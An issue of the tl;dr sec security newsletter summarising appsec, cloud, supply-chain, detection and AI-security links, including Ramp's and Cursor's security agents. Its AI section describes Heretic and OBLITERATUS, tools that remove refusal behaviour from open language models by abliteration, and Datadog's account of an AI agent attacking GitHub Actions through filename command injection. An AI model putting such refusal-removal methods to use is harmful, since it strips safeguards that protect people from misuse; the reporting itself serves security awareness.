- tl;dr sec
- Posts
- [tl;dr sec] #320 - Ramp's Security Agents, How Datadog Caught Malicious OSS Contributions, Obliterating Model Refusals
[tl;dr sec] #320 - Ramp's Security Agents, How Datadog Caught Malicious OSS Contributions, Obliterating Model Refusals
How Ramp fixed ~100 security issues in 6 days, detecting and mitigating GitHub supply chain attacks, two tools to automatically remove censorship from models
Hey there,
I hope you’ve been doing well!
👩💻 Brace Yourself, Conferences Cometh
I’m excited for BSidesSF and RSA but phew, things have been busy 😅
If you’re flying in to San Francisco, safe travels! And remember to periodically eat, sleep, and shower amidst all the fun conference and event activities.
Friday - tl;dr sec Community Kickoff.
Mostly filling up, but DM me and I’ll try get you in.
Saturday - I’m joining my friends on an Absolute AppSec panel, and will be at BSidesSF both days!
Wednesday - Coding Agents Unleashed hosted by TL;DR Sec & Unsupervised Learning - There’s going to be some 🔥 lightning talks from smart folks. Broader Decibel registration link here.
Semgrep is also having a ton of events. If you need a break from the RSA craziness you can stop by the office, get some coffee, snacks, or lunch, and chat with some Semgrep folks if you want.
If you find me I’ll have some tl;dr sec t-shirts and brand new stickers…

Hard to tell from the photo but it’s holographic
Sponsor
📣 Cybercrime Just Hit Escape Velocity
(Here’s the Evidence)
Flashpoint just released its 2026 Global Threat Intelligence Report, and the data is shocking.
AI-related illicit activity surged 1,500% in a single month
3.3B compromised credentials are now fueling identity-based attacks
Ransomware incidents increased 53% as groups pivot toward pure-play extortion
The report also explores how threat actors are moving from generative tools to agentic AI frameworks that can automate attacks at scale.
👉 View the Report 👈
AI is definitely helping threat actors in a number of ways, I’m curious to see more 👀 Agent-led end-to-end attacks and automated exploitation sounds very interesting.
AppSec
Quicklinks
Applying Security Engineering to Make Phishing Harder - Lessons learned by Doyensec from testing a “Communication Platform as a Service.”
Corridor Raises $25M Series A to Secure AI Coding at the Source - Corridor is tackling a problem many Security and Engineering Teams are starting to feel big time - code being generated faster than traditional AppSec can secure it. Corridor’s approach embeds security directly into AI coding workflows. Backed by some of the smartest investors in AI and AppSec. tl;dr sec readers get 3 months free!*
Corridor has been able to pull some security OGs, like Alex Stamos and Joel Wallenstrom. I’m excited to see what they’re building 🤘
Martino Spagnuolo - The Forgotten Bug: How a Node.js Core Design Flaw Enables HTTP Request Splitting
*Sponsored
Introducing Swagger Jacker: Auditing OpenAPI Definition Files
Bishop Fox’s Tony West announces Swagger Jacker, a command line tool for auditing endpoints defined in exposed (Swagger/OpenAPI) definition files. It parses the definition file for paths, parameters, and accepted methods and passes the results to one of five subcommands: automate (sends requests and analyzes response status codes), prepare (generates curl/sqlmap command templates for manual testing), endpoints (lists raw API routes), brute (discovers hidden definition files using 2173+ common paths), and convert (converts v2 to v3 definitions).
mitmproxy for fun and profit: Interception and Analysis of Application
Guide by Synacktiv's Corentin Liaud on using mitmproxy for network traffic interception across Linux, Android, and iOS, including three examples: redirecting git clone requests to download a different repository by modifying HTTP paths, spoofing Android geolocation by parsing and altering gRPC/protobuf coordinates sent to Google's geomobileservices API, and passively capturing Mumble VoIP chat messages by running mitmproxy in reverse TLS mode with custom protobuf parsing scripts.
The post describes setting up your test environment (using Linux network namespaces, lnxrouter for WiFi AP creation, and nftables for transparent traffic redirection), using Magisk's Cert-Fixer module to install system certificates on Android, and includes Python scripts showing how to parse and modify protocol buffers in transit.
Sponsor
📣 Your SOC is a queueing system.
The math matters more than you think.
If you've ever looked at utilization curves, you know what happens when a queue runs hot: wait time doesn't scale linearly. It spikes. In a SOC, that means alerts aging out before anyone touches them.
"The Queue is the Breach" ebook from Prophet Security applies operational math to SOC performance: alert cycle time, wait time by severity, and what analyst utilization actually implies about your team's capacity. It's a framework for diagnosing whether your bottleneck is people, tooling, or the operating model.
Written by Jon Hencinski, Head of Security Operations at Prophet.
Nice, I like when people take a data-driven approach to security 👍️
Cloud Security
Twenty Years of Cloud Security Research
Cloud historian, scholar, and man of the people Scott Piper traces 20 years of cloud security evolution through three distinct eras: the Foundational era (2006-2016) when AWS built core security features like IAM (2011), CloudTrail (2013), and Organizations (2016); the CSPM era (2016-2021) marked by open-source tools like Scout2, Cloud Custodian, Prowler, CloudMapper, Pacu, and StreamAlert; and the CNAPP era (2021-2025) with new cloud security vendors and researchers discovering cross-tenant vulnerabilities like chaosdb and omigod. The emerging AI era (2025+) is fundamentally changing both offense and defense, with AI creating exploits for CVE-2025-32433 and mongobleed in minutes, winning HackerOne's top bounty spot, and solving CTF challenges instantly.
💡 Great overview of relevant research and tools, and nice perspective on how cloud security has been evolving over time.
Bucketsquatting is (Finally) Dead
Ian McKay describes AWS's new S3 bucket namespace protection that prevents bucketsquatting attacks by requiring buckets to follow the format <prefix>-<accountid>-<region>-an, ensuring only the owning account can create buckets matching that pattern. AWS recommends this namespace be used by default for all new buckets and provides a new condition key s3:x-amz-bucket-namespace that security administrators can enforce via SCP policies across their organization.
Google Cloud Storage addresses this differently through domain name verification for bucket names, while Azure Blob Storage remains vulnerable due to its configurable account/container name structure and 24-character limit on storage account names.
See AWS Finally Gave S3 Buckets Their Own Rooms for more context on the issue and an overview of relevant prior research by Aqua.
Supply Chain
Building Bridges, Breaking Pipelines: Introducing Trajan
Praetorian's AJ Hammond, Carter Ross, Evan Leleux et al announce Trajan, an open-source CI/CD security tool from Praetorian that unifies vulnerability detection and attack validation across GitHub Actions, GitLab CI, Azure DevOps, and Jenkins in a single cross-platform engine. It ships with 32 detection plugins and 24 attack plugins covering poisoned pipeline execution, secrets exposure, self-hosted runner risks, and AI/LLM pipeline vulnerabilities.
When an AI agent came knocking: Catching malicious contributions in Datadog’s open source repos
Datadog’s Christoph Hamsen, Christophe Tafani-Dereeper, and Kylian Serrania describe how their LLM-powered code review system BewAIre detected and helped mitigate attacks from hackerbot-claw, an AI agent that attempted to exploit GitHub Actions workflows across their open source repositories. The attacker successfully achieved code execution in one workflow via command injection in filenames, but defense-in-depth controls (organization-wide GitHub rulesets preventing direct pushes to main branches, restricted GITHUB_TOKEN permissions, and no sensitive secrets exposure) limited impact to only pushing a harmless commit to a non-protected branch.
💡 Nice walk through of noticing your open source repos are being targeted → investigating potential impact, and solid advice on hardening open source repos/GitHub Actions. Also, I really like the bullets towards the top on Datadog’s SDLC Security team initiatives re: adapting octo-sts, removing GitHub Action secrets at scale, enforcing CI security best practices, and building golden paths.
Blue Team
elastic/agent-skills
Elastic’s official Skills repos, covering cloud, Elasticsearch, Kibana, observability, and security. Currently includes 4 security Skills for: triaging alerts, case management (managing SOC cases via Kibana Cases when tracking incidents), detection rule management (create, tune, and manage Elastic Security detection rules), and generating sample security data (security events, attack scenarios, and synthetic alerts).
Building a Cloud-Native Detection Engineering Lab with Terraform and AWS
Rafael Martinez describes building a fully automated detection engineering lab (GitHub) in AWS using Terraform to overcome local hardware limitations, deploying three EC2 instances: Kali Linux (attacker), Windows Server with Sysmon and Winlogbeat (target), and Ubuntu running Elasticsearch and Kibana (SIEM). Easy to spin up and down as needed.
Pattern Detection and Correlation in JSON Logs
Mostafa Moradian announces RSigma, a Rust-based command-line tool that evaluates Sigma detection rules against JSON logs without requiring a SIEM. “Think of RSigma as jq for threat detection: you point it at a set of Sigma detection rules and a stream of JSON events, and it tells you what matched, with no ingestion pipeline, no database, no infrastructure.”
RSigma parses YAML rules into a strongly-typed AST, compiles them into optimized matchers, and evaluates them directly against JSON log events in real-time. The toolkit includes rsigma-parser for parsing, rsigma-eval for compilation and evaluation with stateful correlation logic and compressed event storage, a CLI for parsing, validating, linting, and evaluating rules, and rsigma-lsp for IDE support.
💡 Accurately evaluating the full spectrum of what Sigma rules can express is quite complex, it’s pretty neat to read about how RSigma handles all of these conditional expressions, correlating across rules, etc.
Red Team
nikaiw/VMkatz
Extract Windows credentials directly from VM memory snapshots and virtual disks. A single static 2.5MB binary that can extract NTLM hashes, DPAPI master keys, Kerberos tickets, cached domain credentials, LSA secrets, NTDS.dit, directly from VM memory snapshots and virtual disks, no need to exfiltrate a massive VM file.
Solving the Vendor Dependency Problem in RE
Many enterprise applications ship with hundreds to thousands of vendor dependencies, which makes it annoying to locate and analyze the proprietary source code of the application. You drown in vendor code, not the exposed attack surface. Assetnote’s Patrik Grobshäuser announces the release of Hyoketsu, an open-source tool that automatically filters vendor dependencies from Java JARs and .NET DLLs during reverse engineering by using Microsoft runtime detection (via PE header public key tokens), hash matching, and filename matching against a 13.3 GB pre-built SQLite database containing 12M+ DLLs and 14M+ JARs.
AI + Security
p-e-w/heretic
By Philipp Emanuel Weidmann: Fully automatic censorship removal for language models. Heretic removes censorship (aka "safety alignment") from transformer-based language models without expensive post-training by combining an advanced implementation of directional ablation, also known as "abliteration.” This approach creates a decensored model that retains as much of the original model's intelligence as possible.
elder-plinius/OBLITERATUS
By Pliny the Liberator: An open-source toolkit for removing refusal behaviors from LLMs via abliteration (surgically identifying and projecting out internal refusal representations without retraining). Every obliteration run with telemetry enabled contributes anonymous benchmark data to a crowd-sourced research dataset measuring refusal direction universality across 116+ models and 5 compute tiers
Blog overview: OBLITERATUS Strips AI Safety From Open Models in Minutes, and pretty detailed Hugging Face guest post by Maxime Labonne on abliteration here, including code on Google Colab and in an LLM course on GitHub.
💡 As open source models become better and better, not sure how I feel about removing “don’t cause harm” alignment training 😅
Why Codex Security Doesn’t Include a SAST Report
OpenAI describes why Codex Security doesn’t start by triaging SAST results, but instead starts with understanding the repository’s architecture and trust boundaries: they don’t want to overly influence where Codex looks, not all bugs are dataflow problems, and sometimes code appears to enforce a security check, but it doesn’t actually guarantee the property the system relies on.
When Codex Security encounters a boundary that looks like “validation” or “sanitization,” it tries to bypass it:
Reading the relevant code path with full repository context, looking for mismatches between intent and implementation.
Pulling out security-relevant code slices and writing micro-fuzzers for them.
They give the model access to a Python environment with z3-solver for solving complicated input constraint problems.
Executing hypotheses in a sandboxed validation environment to prove exploitability.
💡 The post is overall a good discussion of the space and outlines challenges for security scanners. I especially liked though the “how Codex validates” section, because it starts getting into some of Codex Security’s unique technical details.
Securing our codebase with autonomous agents
Travis McPeak describes how Cursor built four security automation templates using Cursor Automations and a custom security MCP tool to handle securing their code at scale, as Cursor’s PR velocity has increased 5x in the past 9 months. The automations include: Agentic Security Review (blocks PRs with security issues), Vuln Hunter (scans existing code for vulnerabilities), Anybump (automatically patches dependencies using reachability analysis and opens PRs after tests pass), and Invariant Sentinel (monitors daily for drift against security/compliance properties). You can see their prompts on their marketplace pages.
Their security MCP, deployed as a serverless Lambda function, provides persistent data storage, deduplication of LLM-generated findings using Gemini Flash 2.5, and consistent Slack reporting across all agents. In the last two months, Agentic Security Review alone has run on thousands of PRs and prevented hundreds of security issues from reaching production.
💡 I like the focus on useful primitives that empower you to build security tooling on top of: “For agents to be useful for security, they need: out-of-the-box integrations for receiving webhooks, responding to GitHub pull requests, and monitoring codebase changes, and a rich agent harness and environment (cloud agents give them all the tools, skills, and observability that cloud agents have access to).
I also wanted to call out the Invariant Sentinel, that’s very clever: what security properties about this repo should always be true? Did this most recent change violate that? I bet detecting drift like this catches some meaningful bugs.
We proactively fixed ~100 security issues in 6 days with 0 humans
Eli Block describes how Ramp Security Engineering built a custom agent pipeline that autonomously found, validated, and fixed ~100 novel security issues in 6 days. Their pipeline starts off with a coordinator agent equipped with skills for each vulnerability category (e.g. IDOR, XSS, …), which launches detector agents in parallel, whose findings are then passed to an adversarial manager agent who checks for false positives (~40% false positive reduction in their sample set of testing).
They found it was difficult to reproduce vulnerabilities with complex pre-conditions against a live Ramp deployment, so instead their validator agent takes reported findings and writes an integration test that reproduced the vulnerability that passes only if the endpoint was secure. Then the fixer agent can patch the vulnerability by following test-driven development on the previously written integration test.
💡 Great write-up! Overall this agent pipeline follows a pretty standard structure (per bug class detectors → vet findings → try to reproduce / “prove” the issue → generate fix), but a few things stand out as unique and valuable insights:
Detectors include real examples of that vulnerability from Ramp’s code base. I bet this allows the detectors to be much more precise and effective.
Rather than trying to reproduce vulnerabilities in a live environment, they write integration tests that demonstrate the bug. As there are probably already test fixtures or other examples in the code the agent can borrow from, it makes sense that this method would often work in practice. This approach also has the added benefit that you now have a regression test for this bug coming back in the future.
So this leans into what models are good at (writing code) and future proofs the bug from coming back 👍️
I’ve been thinking about this approach for a bit now so it’s gratifying to see someone do it 🙂
Misc
Tech
vercel-labs/portless - Replace port numbers with stable, named
.localhostURLs for local development.peakoss/anti-slop - A GitHub action that detects and automatically closes low-quality and AI slop PRs.
Meta created ‘playbook’ to fend off pressure to crack down on scammers, documents show
Resist and Unsubscribe - Scott Galloway’s initiative to influence politics by voting with your wallet.
Andrej Karpathy - US Job Market Visualizer
The most important question nobody's asking about AI - Why Dwarkesh Patel is happy the Anthropic fight is happening now.
Startup's agent hacked McKinsey AI - exposing huge volumes of sensitive data - $20 in tokens and two hours to expose 46 million chat logs, 728,000 private files and proprietary RAG documentation. HN discussion.
Undercover Cop Generated An AI Teenager To Catch Pedophiles - Apparently AI has “been a boon for child abuse investigators,” as when asked for selfies they don’t need to use real images.
Related: In 2018, Microsoft volunteers worked with nonprofit Street Grace to create an AI chatbot that interacts with people who click on decoy advertisements on trafficking sites.
Misc
Ed Sheeran on Friends Keep Secrets - Quickly creating a song from scratch with Benny Blanco. Wow, super cool 😍
Kai Lentit - Shipping a button in 2026… 😂
Politics
Foreign hacker in 2023 compromised Epstein files FBI held - “The hacker expressed disgust at the presence of child abuse images on the device and left a message threatening to turn its owner over to the FBI. Bureau officials defused the situation by convincing the hacker that they actually were the FBI.” 😂
Putin can’t survive without war - The article argues that Russia's war in Ukraine has transformed the country into a "necropolis" where death has become central to its economy, culture, and social fabric. The war sustains a "deathonomics" model where provincial economies depend on recruitment bonuses and death payments (sometimes reaching $60,000). 40% of state spending now flows to military efforts. Really tough read on the impact on every day Russians :(
Trump in November 2011: “Our president (Obama) will start a war with Iran because he has absolutely no ability to negotiate… The only way he figures he’s going to get reelected is to start a war with Iran.”
NBC - How Trump decided to strike Iran - “Before the U.S. and Israel launched their aerial assault, the CIA concluded that if the supreme leader, Ayatollah Ali Khamenei, was killed, he could be replaced by equally hard-line officials from within the regime, according to two people familiar with the matter.”
“Treasury Secretary Scott Bessent told Congress last month that the U.S. had purposely touched off an economic crisis in Iran that led to the massive street protests early this year that jarred the regime. By creating a dollar shortage in Iran, the U.S. forced Iran to print money, sparking inflation and stoking internal enmity toward the leadership, Bessent said.”
“…Trump flew to Mar-a-Lago, where he monitored the strike in the company of senior advisers, as he has done for several foreign strikes this term. He also made time Saturday to attend a political fundraising event at his seaside resort.”
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!
Cheers,
Clint
P.S. Feel free to connect with me on LinkedIn 👋